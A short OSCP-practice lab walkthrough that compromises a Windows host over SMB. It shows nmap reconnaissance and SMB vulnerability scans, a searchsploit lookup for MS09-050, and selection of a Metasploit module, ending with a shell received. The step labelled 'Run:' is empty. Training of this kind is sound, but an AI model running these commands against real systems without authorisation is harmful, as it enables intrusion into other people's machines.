Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Step 1: Reconnaissance

Nmap Scan

nmap -sCV -A --min-rate 1000 <TARGET_IP>

Key findings: SMB port open

SMB Enumeration - Port 135,139

nmap --script smb-vuln* 192.168.205.40

Step 2: Vulnerability Research

searchsploit MS09-050

EDB-40280 matches the running version. Use msfconsole.

Step 3: Exploitation - msfconsole for SMBv2

msfconsole

Modify & Run the Exploit

Update the exploit with the target IP, and use this exploit:

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Run:

Initial Shell Received
